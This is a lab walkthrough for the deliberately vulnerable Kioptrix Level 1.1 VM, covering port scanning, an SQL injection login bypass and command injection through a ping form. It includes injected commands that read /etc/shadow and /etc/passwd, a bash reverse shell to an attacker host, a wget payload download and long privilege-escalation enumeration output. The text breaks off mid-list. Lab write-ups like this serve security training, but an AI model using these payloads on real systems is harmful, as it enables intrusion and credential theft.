Kioptrix Level 1.1 Walkthrough
Preparation:
Download the virtual machine from the following website:
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
The target server: Kioptirx Level 1.1(#2)
1. Discover the IP address of the target server. We find the target IP address is 10.0.0.28 in this case.
netdiscover -r 10.0.0.0/24
2. Perform the TCP/UDP scan using the tool Nmap.
TCP scan 1:
nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN /root/kioptrix2/tcp1.txt 10.0.0.28
TCP Scan 2:
nmap -nvv -Pn- -sSV -p 22,80,111,443,631,646,3306 --version-intensity 9 -A -oN /root/kioptrix2/tcp2.txt 10.0.0.28
3. Browse the target website through Firefox.
The source page shows the following code:
<html> <body> <form method="post" name="frmLogin" id="frmLogin" action="index.php"> <table width="300" border="1" align="center" cellpadding="2" cellspacing="2"> <tr> <td colspan='2' align='center'> <b>Remote System Administration Login</b> </td> </tr> <tr> <td width="150">Username</td> <td><input name="uname" type="text"></td> </tr> <tr> <td width="150">Password</td> <td> <input name="psw" type="password"> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" name="btnLogin" value="Login"> </td> </tr> </table> </form> <!-- Start of HTML when logged in as Administator --> </body> </html>
Try to use the cheat sheet in the following website to test for SQL injection authentication bypass.
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
Ahaaaa! The cheat sheet 'admin' #' is effective.
The source page shows the following codes:
<html> <body> <!-- Start of HTML when logged in as Administator --> <form name="ping" action="pingit.php" method="post" target="_blank"> <table width='600' border='1'> <tr valign='middle'> <td colspan='2' align='center'> <b>Welcome to the Basic Administrative Web Console<br></b> </td> </tr> <tr valign='middle'> <td align='center'> Ping a Machine on the Network: </td> <td align='center'> <input type="text" name="ip" size="30"> <input type="submit" value="submit" name="submit"> </td> </td> </tr> </table> </form> </body> </html>
4. Try to find more interesting things through the pingit page.
Ping "127.0.0.1"
Ping "127.0.0.1;id", so we find the uid.
Ping "127.0.0.1;pwd"
Ping "127.0.0.1;cat /etc/shadow". But No root authentication.
Ping "127.0.0.1;cat /etc/passwd".
5. Try to find a command execution vulnerability using the reverse shell cheat sheet in the pentest monkey website.
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Start the tool Ncat in the Kali Linux.
nc -nvlp 4444
Copy the bash command to the pingit page and modify it.
Ping "127.0.0.1;bash -i >& /dev/tcp/10.0.0.26/4444 0>&1"
Ahaaa. The communication is established.
Down load the linuxprivchecker.py file from the Kali Linux to the Kioptrix server.
wget http://10.0.0.26/linuxprivchecker.py
Run the linuxprivchecker.py on the Kioptrix server. Find the Kernel version first.
chmod 777 linuxprivchecker.py python linuxprivchecker.py
================================================================================================= LINUX PRIVILEGE ESCALATION CHECKER ================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007 [+] Hostname kioptrix.level2 [+] Operating System Welcome to Kioptrix Level 2 Penetration and Assessment Environment --The object of this game: |_Acquire "root" access to this machine. There are many ways this can be done, try and find more then one way to appreciate this exercise. DISCLAIMER: Kioptrix is not resposible for any damage or instability caused by running, installing or using this VM image. Use at your own risk. WARNING: This is a vulnerable system, DO NOT run this OS in a production environment. Nor should you give this system access to the o(Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) utside world (the Internet - or Interwebs..) Good luck and have fun! [*] GETTING NETWORKING INFO... [+] Interfaces eth0 Link encap:Ethernet HWaddr 00:0C:29:BE:7B:78 inet addr:10.0.0.28 Bcast:10.0.0.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:febe:7b78/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:281068 errors:8 dropped:37 overruns:0 frame:0 TX packets:221829 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:29487030 (28.1 MiB) TX bytes:39516124 (37.6 MiB) Interrupt:177 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:258 errors:0 dropped:0 overruns:0 frame:0 TX packets:258 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:20134 (19.6 KiB) TX bytes:20134 (19.6 KiB) sit0 Link encap:IPv6-in-IPv4 NOARP MTU:1480 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) [+] Netstat Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:623 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:631 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - tcp 0 125 10.0.0.28:38572 10.0.0.26:4444 ESTABLISHED 12253/bash tcp 0 0 :::80 :::* LISTEN 12251/sh tcp 0 0 :::22 :::* LISTEN - tcp 0 0 :::443 :::* LISTEN 12251/sh tcp 0 0 ::ffff:10.0.0.28:80 ::ffff:10.0.0.26:50256 ESTABLISHED 12251/sh udp 0 0 0.0.0.0:68 0.0.0.0:* - udp 0 0 0.0.0.0:617 0.0.0.0:* - udp 0 0 0.0.0.0:620 0.0.0.0:* - udp 0 0 0.0.0.0:111 0.0.0.0:* - udp 0 0 0.0.0.0:631 0.0.0.0:* - [+] Route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 10.0.0.0 * 255.255.255.0 U 0 0 0 eth0 default 10.0.0.1 0.0.0.0 UG 0 0 0 eth0 [*] GETTING FILESYSTEM INFO... [+] Mount results /dev/mapper/VolGroup00-LogVol00 on / type ext3 (rw) none on /proc type proc (rw) none on /sys type sysfs (rw) none on /dev/pts type devpts (rw,gid=5,mode=620) /dev/hda1 on /boot type ext3 (rw) none on /dev/shm type tmpfs (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw) [+] fstab entries # This file is edited by fstab-sync - see 'man fstab-sync' for details /dev/VolGroup00/LogVol00 / ext3 defaults 1 1 LABEL=/boot /boot ext3 defaults 1 2 none /dev/pts devpts gid=5,mode=620 0 0 none /dev/shm tmpfs defaults 0 0 none /proc proc defaults 0 0 none /sys sysfs defaults 0 0 /dev/VolGroup00/LogVol01 swap swap defaults 0 0 [+] Scheduled cron jobs -rw-r--r-- 1 root root 0 Oct 7 2009 /etc/cron.deny -rw-r--r-- 1 root root 255 Feb 21 2005 /etc/crontab /etc/cron.d: total 24 drwxr-xr-x 2 root root 4096 Jul 12 2006 . drwxr-xr-x 80 root root 12288 Aug 3 02:29 .. /etc/cron.daily: total 108 drwxr-xr-x 2 root root 4096 Oct 7 2009 . drwxr-xr-x 80 root root 12288 Aug 3 02:29 .. lrwxrwxrwx 1 root root 28 Oct 7 2009 00-logwatch -> ../log.d/scripts/logwatch.pl -rwxr-xr-x 1 root root 418 Sep 14 2006 00-makewhatis.cron -rwxr-xr-x 1 root root 135 Feb 21 2005 00webalizer -rwxr-xr-x 1 root root 276 Feb 21 2005 0anacron -rw-r--r-- 1 root root 797 Feb 21 2005 certwatch -rwxr-xr-x 1 root root 180 Oct 20 2006 logrotate -rwxr-xr-x 1 root root 2133 Dec 1 2004 prelink -rwxr-xr-x 1 root root 104 May 4 2007 rpm ls: //.*_history: No such file or directory -rwxr-xr-x 1 root root 121 Aug 21 2005 slocate.cron -rwxr-xr-x 1 root root 286 Feb 21 2005 tmpwatch -rwxr-xr-x 1 root root 158 May 5 2007 yum.cron /etc/cron.hourly: total 24 drwxr-xr-x 2 root root 4096 Feb 21 2005 . drwxr-xr-x 80 root root 12288 Aug 3 02:29 .. /etc/cron.monthly: total 32 drwxr-xr-x 2 root root 4096 Oct 7 2009 . drwxr-xr-x 80 root root 12288 Aug 3 02:29 .. -rwxr-xr-x 1 root root 278 Feb 21 2005 0anacron /etc/cron.weekly: total 48 drwxr-xr-x 2 root root 4096 Oct 7 2009 . drwxr-xr-x 80 root root 12288 Aug 3 02:29 .. -rwxr-xr-x 1 root root 414 Sep 14 2006 00-makewhatis.cron -rwxr-xr-x 1 root root 277 Feb 21 2005 0anacron -rwxr-xr-x 1 root root 90 May 5 2007 yum.cron [+] Writable cron dirs lrwxrwxrwx 1 root root 28 Oct 7 2009 00-logwatch -> ../log.d/scripts/logwatch.pl [*] ENUMERATING USER AND ENVIRONMENTAL INFO... [+] Logged in User Activity 03:57:07 up 2:33, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [+] Sudoers (privileged) [+] All users root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash john:x:500:500::/home/john:/bin/bash harold:x:501:501::/home/harold:/bin/bash [+] Current User ID uid=48(apache) gid=48(apache) groups=48(apache) [+] Super Users Found: root [+] Environment CONSOLE=/dev/console SELINUX_INIT=YES TERM=linux INIT_VERSION=sysvinit-2.85 PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin _=/bin/env runlevel=3 RUNLEVEL=3 PWD=/tmp LANG=en_US.UTF-8 previous=N PREVLEVEL=N SHLVL=5 HOME=/ [+] Current User apache [+] Root and current user history (depends on privs) [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS... [+] World Writeable Directories for User/Group 'Root' [+] World Writeable Directories for Users other than Root [+] World Writable Files [+] Checking if root's home folder is accessible [+] SUID/SGID Files and Directories -rwxr-Sr-t 1 root root 1733 Feb 9 2012 /var/www/html/index.php -rwxr-Sr-t 1 root root 199 Oct 8 2009 /var/www/html/pingit.php -rwxr-sr-x 1 root root 11367 May 3 2007 /sbin/netreport -r-sr-xr-x 1 root root 46076 May 2 2007 /sbin/unix_chkpwd -r-s--x--x 1 root root 20016 May 2 2007 /sbin/pam_timestamp_check -r-sr-xr-x 1 root root 301242 May 2 2007 /sbin/pwdb_chkpwd -rwsr-xr-x 1 root root 6096 May 2 2007 /usr/sbin/ccreds_validate -rwxr-sr-x 1 root lock 15372 Apr 4 2006 /usr/sbin/lockdev -rws--x--x 1 root root 30760 May 2 2007 /usr/sbin/userhelper -rwxr-sr-x 1 root smmsp 746328 May 2 2007 /usr/sbin/sendmail.sendmail -rwsr-xr-x 1 root root 6668 Feb 21 2005 /usr/sbin/userisdnctl -rwxr-sr-x 1 root utmp 10497 Feb 21 2005 /usr/sbin/utempter -r-s--x--- 1 root apache 10760 May 4 2007 /usr/sbin/suexec -rwsr-xr-x 1 root root 15228 May 3 2007 /usr/sbin/usernetctl -rws--x--x 1 root root 434644 May 2 2007 /usr/libexec/openssh/ssh-keysign -rwsr-xr-x 1 root root 7396 May 2 2007 /usr/libexec/pt_chown -rwsr-xr-x 1 root root 123961 May 3 2007 /usr/kerberos/bin/ksu -rwsr-x--- 1 root squid 9952 May 4 2007 /usr/lib/squid/pam_auth -rwsr-x--- 1 root squid 10208 May 4 2007 /usr/lib/squid/ncsa_auth -r-xr-sr-x 1 root tty 9752 May 5 2007 /usr/bin/wall -rwxr-sr-x 1 root slocate 38548 Aug 21 2005 /usr/bin/slocate -rws--x--x 1 root root 18392 May 3 2007 /usr/bin/chsh -rwxr-sr-x 1 root mail 14636 Feb 21 2005 /usr/bin/lockfile -rwsr-xr-x 1 root root 17304 May 10 2006 /usr/bin/rcp ---s--x--x 1 root root 93816 Aug 21 2005 /usr/bin/sudo -rwxr-sr-x 1 root tty 10124 May 3 2007 /usr/bin/write -rwsr-xr-x 1 root root 117802 May 2 2007 /usr/bin/chage -rwsr-xr-x 1 root root 82772 Jul 12 2006 /usr/bin/crontab -rwsr-xr-x 1 root root 12312 May 10 2006 /usr/bin/rlogin -rwsr-xr-x 1 root root 8692 May 10 2006 /usr/bin/rsh -rwsr-xr-x 1 root root 131181 May 2 2007 /usr/bin/gpasswd -rwsr-xr-x 1 root root 42280 Apr 26 2006 /usr/bin/at -rws--x--x 1 root root 7700 May 3 2007 /usr/bin/newgrp -rws--x--x 1 root root 17708 May 3 2007 /usr/bin/chfn -rwxr-sr-x 1 root nobody 57932 May 2 2007 /usr/bin/ssh-agent -rwsr-xr-x 1 root root 19597 May 3 2007 /usr/bin/lppasswd -rwsr-xr-x 1 root root 72261 May 2 2007 /usr/bin/sg -r-s--x--x 1 root root 21200 Aug 21 2005 /usr/bin/passwd -rwsr-xr-x 1 root root 87016 May 3 2007 /bin/mount -rwsr-xr-x 1 root root 12300 May 2 2007 /bin/traceroute6 -rwsr-xr-x 1 root root 23844 Nov 23 2006 /bin/traceroute -rwsr-xr-x 1 root root 53612 May 3 2007 /bin/umount -rwsr-xr-x 1 root root 30924 May 2 2007 /bin/ping6 -rwsr-xr-x 1 root root 33272 May 2 2007 /bin/ping -rwsr-xr-x 1 root root 61168 May 5 2007 /bin/su [+] Logs containing keyword 'password' [+] Config files containing keyword 'password' Binary file /etc/prelink.cache matches /etc/lftp.conf:## This can be e.g. TIS-FWTK or rftpd. User and password are optional. /etc/ltrace.conf:; pwd.h /etc/pwdb.conf:# This is the configuration file for the pwdb library /etc/log.d/logwatch.conf:#Service = pam_pwdb # PAM_pwdb messages - usually quite a bit /etc/log.d/conf/logwatch.conf:#Service = pam_pwdb # PAM_pwdb messages - usually quite a bit /etc/log.d/conf/services/pam_pwdb.conf:# $Id: pam_pwdb.conf,v 1.7 2002/10/12 02:08:09 kirk Exp $ /etc/log.d/conf/services/pam_pwdb.conf:Title = "PAM_pwdb" /etc/log.d/conf/services/pam_pwdb.conf:# Only give lines pertaining to the PAM_pwdb service... /etc/log.d/conf/services/pam_pwdb.conf:*OnlyService = pam_pwdb /etc/squid/squid.conf.default:# login=user:password | PASS | *:password /etc/squid/squid.conf.default:# use 'login=user:password' if this is a personal/workgroup /etc/squid/squid.conf.default:# password to the peer. USE WITH CAUTION /etc/squid/squid.conf.default:# use 'login=*:password' to pass the username to the /etc/squid/squid.conf.default:# upstream cache, but with a fixed password. This is meant /etc/squid/squid.conf.default:# the login=username:password option above. /etc/squid/squid.conf.default:# If you want the anonymous login password to be more informative /etc/squid/squid.conf.default:# reads a line containing "username password" and replies "OK" or /etc/squid/squid.conf.default:# backlog of usercode/password verifications, slowing it down. When /etc/squid/squid.conf.default:# password verifications are done via a (slow) network you are likely to /etc/squid/squid.conf.default:# will see when prompted their username and password). /etc/squid/squid.conf.default:# username:password pair is valid for - in other words how often the /etc/squid/squid.conf.default:# revalidation with short lived passwords. Note that setting this high /etc/squid/squid.conf.default:# using an one-time password system (such as SecureID). If you are using /etc/squid/squid.conf.default:# when prompted their username and password). /etc/squid/squid.conf.default:# # to check username/password combinations (see /etc/squid/squid.conf.default:#acl password proxy_auth REQUIRED /etc/squid/squid.conf.default:# user's default group ID (taken from the password file) and /etc/squid/squid.conf.default:# Specify passwords for cachemgr operations. /etc/squid/squid.conf.default:# Usage: cachemgr_passwd password action action ... /etc/squid/squid.conf.default:# valid password, others can be performed if not listed here. /etc/squid/squid.conf.default:# To disable an action, set the password to "disable". /etc/squid/squid.conf.default:# To allow performing an action without a password, set the /etc/squid/squid.conf.default:# password to "none". /etc/squid/squid.conf.default:# Use the keyword "all" to set the same password for all actions. /etc/pear.conf:a:23:{s:9:"cache_dir";s:19:"/var/cache/php-pear";s:15:"default_channel";s:12:"pear.php.net";s:16:"preferred_mirror";s:12:"pear.php.net";s:13:"remote_config";s:0:"";s:13:"auto_discover";i:0;s:13:"master_server";s:12:"pear.php.net";s:10:"http_proxy";s:0:"";s:7:"php_dir";s:15:"/usr/share/pear";s:7:"doc_dir";s:19:"/usr/share/pear/doc";s:7:"bin_dir";s:8:"/usr/bin";s:8:"data_dir";s:20:"/usr/share/pear/data";s:8:"test_dir";s:20:"/usr/share/pear/test";s:7:"php_bin";s:12:"/usr/bin/php";s:8:"username";s:0:"";s:8:"password";s:0:"";s:7:"verbose";i:1;s:15:"preferred_state";s:6:"stable";s:5:"umask";i:18;s:9:"cache_ttl";i:3600;s:8:"sig_type";s:3:"gpg";s:7:"sig_bin";s:12:"/usr/bin/gpg";s:9:"sig_keyid";s:0:"";s:10:"sig_keydir";s:13:"/etc/pearkeys";} /etc/httpd/conf.d/ssl.conf:# Note that no password is obtained from the user. Every entry in the user /etc/httpd/conf.d/ssl.conf:# file needs this password: `xxj31ZMTZzkVA'. /etc/samba/smb.conf:# Use password server option only with security = server /etc/samba/smb.conf:; password server = <NT-Server-Name> /etc/samba/smb.conf:# Password Level allows matching of _n_ characters of the password for /etc/samba/smb.conf:; password level = 8 /etc/samba/smb.conf:# You may wish to use password encryption. Please read /etc/samba/smb.conf:; encrypt passwords = yes /etc/samba/smb.conf:# The following are needed to allow password changing from Windows to /etc/samba/smb.conf:# update the Linux system password also. /etc/samba/smb.conf:# NOTE: Use these with 'encrypt passwords' and 'smb passwd file' above. /etc/samba/smb.conf:# the encrypted SMB passwords. They allow the Unix password /etc/samba/smb.conf:# to be kept in sync with the SMB password. /etc/samba/smb.conf:; unix password sync = Yes /etc/samba/smb.conf:; passwd chat = *New*UNIX*password* %n *ReType*new*UNIX*password* %n *passwd:*all*authentication*tokens*updated*successfully* /etc/my.cnf:# Default to using old password format for compatibility with mysql 3.x /etc/my.cnf:old_passwords=1 /etc/ldap.conf:# Search the root DSE for the password policy (works /etc/ldap.conf:# If you are using XAD, you can set pam_password /etc/ldap.conf:# Do not hash the password at all; presume /etc/ldap.conf:#pam_password clear /etc/ldap.conf:# Hash password locally; required for University of /etc/ldap.conf:#pam_password crypt /etc/ldap.conf:# Remove old password first, then update in /etc/ldap.conf:#pam_password nds /etc/ldap.conf:#pam_password racf /etc/ldap.conf:# Update Active Directory password, by /etc/ldap.conf:# creating Unicode password and updating /etc/ldap.conf:#pam_password ad /etc/ldap.conf:# Use the OpenLDAP password change /etc/ldap.conf:# extended operation to update the password. /etc/ldap.conf:#pam_password exop /etc/ldap.conf:# Redirect users to a URL or somesuch on password /etc/ldap.conf:#pam_password_prohibit_message Please visit http://internal to change your password. /etc/ldap.conf:#pam_password ad /etc/ldap.conf:#nss_map_attribute shadowLastChange pwdLastSet /etc/ldap.conf:#pam_password ad /etc/ldap.conf:#nss_map_attribute shadowLastChange pwdLastSet /etc/ldap.conf:#pam_password ad /etc/ldap.conf:# configure --enable-authpassword is no longer supported /etc/ldap.conf:#nss_map_attribute userPassword passwordChar /etc/ldap.conf:#pam_password clear /etc/ldap.conf:# at present and does not support password policy control /etc/ldap.conf:pam_password md5 [+] Shadow File (Privileged) [*] ENUMERATING PROCESSES AND APPLICATIONS... [+] Installed Packages 4Suite-1.0-3 acl-2.2.23-5.3.el4 acpid-1.0.3-2 alchemist-1.0.34-1 alsa-lib-1.0.6-5.RHEL4 alsa-utils-1.0.6-6 anacron-2.3-32 apmd-3.0.2-24 apr-0.9.4-24.5.c4.2 apr-util-0.9.4-21 arptables_jf-0.0.8-2 ash-0.3.8-20 aspell-0.50.5-4.EL4 aspell-en-0.51-11 at-3.1.8-80_EL4 atk-1.8.0-2 attr-2.4.16-3.1.el4 audiofile-0.2.6-1.el4.1 audit-1.0.15-3.EL4 audit-libs-1.0.15-3.EL4 authconfig-4.6.10-rhel4.3 authconfig-gtk-4.6.10-rhel4.3 autoconf-2.59-5 autofs-4.1.3-199.3 automake14-1.4p6-12 automake15-1.5-13 automake16-1.6.3-5 automake17-1.7.9-5 automake-1.9.2-3 basesystem-8.0-4 bash-3.0-19.3 bc-1.06-17.1 beecrypt-3.1.0-6 bind-libs-9.2.4-24.EL4 bind-utils-9.2.4-24.EL4 binutils-2.15.92.0.2-22 bison-1.875c-2 bluez-bluefw-1.0-6 bluez-hcidump-1.11-1 bluez-libs-2.10-2 bluez-pin-0.23-3 bluez-utils-2.10-2.1 boost-1.32.0-6.rhel4 boost-devel-1.32.0-6.rhel4 byacc-1.9-28 bzip2-1.0.2-13.EL4.3 bzip2-devel-1.0.2-13.EL4.3 bzip2-libs-1.0.2-13.EL4.3 cdecl-2.5-30 centos-release-4-4.3 checkpolicy-1.17.5-1 chkconfig-1.3.13.5.EL4-1 chkfontpath-1.10.0-2 ckermit-8.0.209-9 comps-4.5CENTOS-0.20070506 comps-extras-10.1-1 coreutils-5.2.1-31.6 cpio-2.5-13.RHEL4 cpp-3.4.6-8 cracklib-2.8.9-1.3 cracklib-dicts-2.8.9-1.3 crash-4.0-3.9 crontabs-1.10-7 crypto-utils-2.1-4 cryptsetup-0.1-4 cscope-15.5-9.RHEL4 ctags-5.5.4-1 cups-1.1.22-0.rc1.9.20 cups-libs-1.1.22-0.rc1.9.20 curl-7.12.1-11.el4 curl-devel-7.12.1-11.el4 cvs-1.11.17-9.RHEL4 cyrus-sasl-2.1.19-5.EL4 cyrus-sasl-devel-2.1.19-5.EL4 cyrus-sasl-md5-2.1.19-5.EL4 cyrus-sasl-plain-2.1.19-5.EL4 dapl-1.2.1-7 db4-4.2.52-7.1 db4-devel-4.2.52-7.1 db4-utils-4.2.52-7.1 dbus-0.22-12.EL.9 dbus-devel-0.22-12.EL.9 dbus-glib-0.22-12.EL.9 dbus-python-0.22-12.EL.9 desktop-file-utils-0.9-3.el4 device-mapper-1.02.17-3.el4 dhclient-3.0.1-59.EL4 dhcpv6_client-0.10-17_EL4 dialog-1.0.20040731-3 diffstat-1.31-5 diffutils-2.8.1-12 diskdumputils-1.3.25-1 distcache-1.4.5-6 dmraid-1.0.0.rc14-5_RHEL4_U5 dmraid-devel-1.0.0.rc14-5_RHEL4_U5 dos2unix-3.1-21.2 dosfstools-2.8-18 doxygen-1.3.9.1-1 dump-0.4b39-3.EL4.2 e2fsprogs-1.35-12.5.el4 e2fsprogs-devel-1.35-12.5.el4 ed-0.2-36 eject-2.0.13-11 elfutils-0.97.1-4 elfutils-libelf-0.97.1-4 emacs-21.3-19.EL.4 emacs-common-21.3-19.EL.4 emacs-leim-21.3-19.EL.4 emacspeak-17.0-7 esound-0.2.35-2 ethtool-1.8-4 expat-1.95.7-4 expat-devel-1.95.7-4 fbset-2.1-17 file-4.10-3.EL4.5 filesystem-2.3.0-1 findutils-4.1.20-7.el4.3 finger-0.17-26.EL4.1 flex-2.5.4a-33 fontconfig-2.2.3-7.centos4 fonts-xorg-75dpi-6.8.2-1.EL freetype-2.1.9-5.el4 ftp-0.17-23.EL4 gamin-0.1.7-1.2.EL4 gawk-3.1.3-10.1 gcc-3.4.6-8 gcc-c++-3.4.6-8 gcc-g77-3.4.6-8 gcc-java-3.4.6-8 GConf2-2.8.1-1 gd-2.0.28-5.4E gdb-6.3.0.0-1.143.el4 gdbm-1.8.0-24 gdbm-devel-1.8.0-24 gettext-0.14.1-13 glib-1.2.10-15 glib2-2.4.7-1 glib2-devel-2.4.7-1 glibc-2.3.4-2.36 glibc-common-2.3.4-2.36 glibc-devel-2.3.4-2.36 glibc-headers-2.3.4-2.36 glibc-kernheaders-2.4-9.1.100.EL gmp-4.1.4-3 gmp-devel-4.1.4-3 gnome-keyring-0.4.0-1 gnome-mime-data-2.4.1-5 gnome-python2-2.6.0-3 gnome-python2-bonobo-2.6.0-3 gnome-python2-canvas-2.6.0-3 gnome-vfs2-2.8.2-8.2 gnupg-1.2.6-9 gnutls-1.0.20-3.2.3 gpg-pubkey-443e1821-421f218f gpm-1.20.1-71.RHEL4 gpm-devel-1.20.1-71.RHEL4 grep-2.5.1-32.3 groff-1.18.1.1-3.EL4 grub-0.95-3.8 gtk2-2.4.13-22 guile-1.6.4-14 gzip-1.3.3-16.rhel4 hal-0.4.2-6.EL4 hdparm-5.7-2 hesiod-3.0.2-30 hesiod-devel-3.0.2-30 hotplug-2004_04_01-7.8 htmlview-3.0.0-8 httpd-2.0.52-32.ent.centos4 httpd-manual-2.0.52-32.ent.centos4 httpd-suexec-2.0.52-32.ent.centos4 hwdata-0.146.28.EL-1 ibutils-1.0-4 indent-2.2.9-6 indexhtml-4-2.centos4 info-4.7-5.el4.2 initscripts-7.93.29.EL-1.centos4 iproute-2.6.9-3.EL4.7 ipsec-tools-0.3.3-6.rhel4.1 iptables-1.2.11-3.1.RHEL4 iptstate-1.3-4 iputils-20020927-19.EL4.5 irda-utils-0.9.16-3 isdn4k-utils-3.2-18.p1.1 java-1.4.2-gcj-compat-1.4.2.0-27jpp jpackage-utils-1.7.3-1jpp.1.el4 jwhois-3.2.2-6.EL4.1 kbd-1.12-2.el4.4 kernel-2.6.9-55.EL kernel-devel-2.6.9-55.EL kernel-hugemem-devel-2.6.9-55.EL kernel-smp-devel-2.6.9-55.EL kernel-utils-2.4-13.1.99 keyutils-1.0-2 keyutils-libs-1.0-2 krb5-devel-1.3.4-47 krb5-libs-1.3.4-47 krb5-workstation-1.3.4-47 krbafs-1.2.2-6 krbafs-devel-1.2.2-6 kudzu-1.1.95.22-1 kudzu-devel-1.1.95.22-1 less-382-4.rhel4 lftp-3.0.6-3 lha-1.14i-17 libacl-2.2.23-5.3.el4 libacl-devel-2.2.23-5.3.el4 libart_lgpl-2.3.16-3 libattr-2.4.16-3.1.el4 libattr-devel-2.4.16-3.1.el4 libbonobo-2.8.0-2 libbonoboui-2.8.0.99cvs20040929-2 libcap-1.10-20 libcap-devel-1.10-20 libdbi-0.6.5-10.RHEL4.1 libdbi-dbd-mysql-0.6.5-10.RHEL4.1 libf2c-3.4.6-8 libgcc-3.4.6-8 libgcj-3.4.6-8 libgcj-devel-3.4.6-8 libgcrypt-1.2.0-3 libglade2-2.4.0-5 libgnome-2.8.0-2 libgnomecanvas-2.8.0-1 libgnomeui-2.8.0-1 libgpg-error-1.0-1 libgssapi-0.8-1 libibcommon-1.0.1-7 libibumad-1.0.1-7 libibverbs-1.0.4-7 libIDL-0.8.4-1.centos4 libidn-0.5.6-1 libidn-devel-0.5.6-1 libjpeg-6b-33 libmng-1.0.8-1 libmthca-1.0.3.1-7 libogg-1.1.2-1 libogg-devel-1.1.2-1 libpcap-0.8.3-10.RHEL4 libpng-1.2.7-1.el4.2 librdmacm-0.9.1-7 libsdp-1.1.0-7 libselinux-1.19.1-7.3 libselinux-devel-1.19.1-7.3 libsepol-1.1.1-2 libstdc++-3.4.6-8 libstdc++-devel-3.4.6-8 libtermcap-2.0.8-39 libtermcap-devel-2.0.8-39 libtiff-3.6.1-12 libtool-1.5.6-4.EL4.1.c4.4 libtool-libs-1.5.6-4.EL4.1.c4.4 libungif-4.1.3-1.el4.2 libusb-0.1.8-3 libusb-devel-0.1.8-3 libuser-0.52.5-1.el4.1 libuser-devel-0.52.5-1.el4.1 libvorbis-1.1.0-1 libvorbis-devel-1.1.0-1 libwvstreams-3.75.0-2 libxml2-2.6.16-10 libxml2-devel-2.6.16-10 libxml2-python-2.6.16-10 libxslt-1.1.11-1 lksctp-tools-1.0.2-6.4E.1 lksctp-tools-devel-1.0.2-6.4E.1 lockdev-1.0.1-6.2 lockdev-devel-1.0.1-6.2 logrotate-3.7.1-6.RHEL4 logwatch-5.2.2-2.EL4 lrzsz-0.12.20-19 lsof-4.72-1.4 ltrace-0.4-3.el4 lvm2-2.02.21-5.el4 m4-1.4.1-16 mailcap-2.1.17-1 mailx-8.1.1-37.EL4 make-3.80-6.EL4 MAKEDEV-3.15.2-3 man-1.5o1-10.rhel4 man-pages-1.67-12.EL4 mdadm-1.12.0-2 